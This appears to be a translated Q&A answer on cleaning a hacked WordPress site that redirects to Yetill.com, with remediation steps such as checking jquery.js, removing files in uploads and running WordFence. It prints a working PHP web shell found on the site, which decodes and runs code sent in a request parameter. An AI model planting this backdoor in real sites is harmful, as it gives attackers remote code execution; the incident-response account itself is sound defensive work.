wordpress - Wordpress 网站总是重定向到 Yetill.com

初步步骤：

1. 备份一切
2. 检查文件 wp-includes/js/jquery/jquery.js - 第一行应该只包含一个评论，比如/*! jQuery v1....在该行之前删除任何内容（你做了备份，对吗？）
3. 检查您的 /wp-content/uploads 目录是否有可疑文件。对我们来说，我们有恶意文件，例如在这个子目录中：/ultimatemember/temp/[random dir]/n.php - 备份后删除这些文件。
4. 安装 WordFence WP 插件并扫描您的网站
5. 仔细检查 wp-includes/js/jquery/jquery.js 是否仍然可以（可以再次修改）
6. 考虑 WordFence 选项“禁用上传目录的代码执行”以防止未来的入侵，如果它适用于您的站点（测试！）。

背景：

我们有同样的问题。Wordfence 注意到文件 wp-includes/js/jquery/jquery.js 在服务器上被修改。恢复到原始版本似乎可以解决它。但是，文件很快就被感染了（几个小时？）。所以我们还不知道来源......

我们在 /wp-content/uploads/ultimatemember/temp/[random dir]/n.php 中发现了一些可疑代码：

<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>

这基本上从外部执行任何 PHP 代码......

删除这些文件后，该网站似乎恢复正常（几个小时）。

我们还注意到页面源中有一个可疑的<a>标签；但不确定它的相关性。

<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>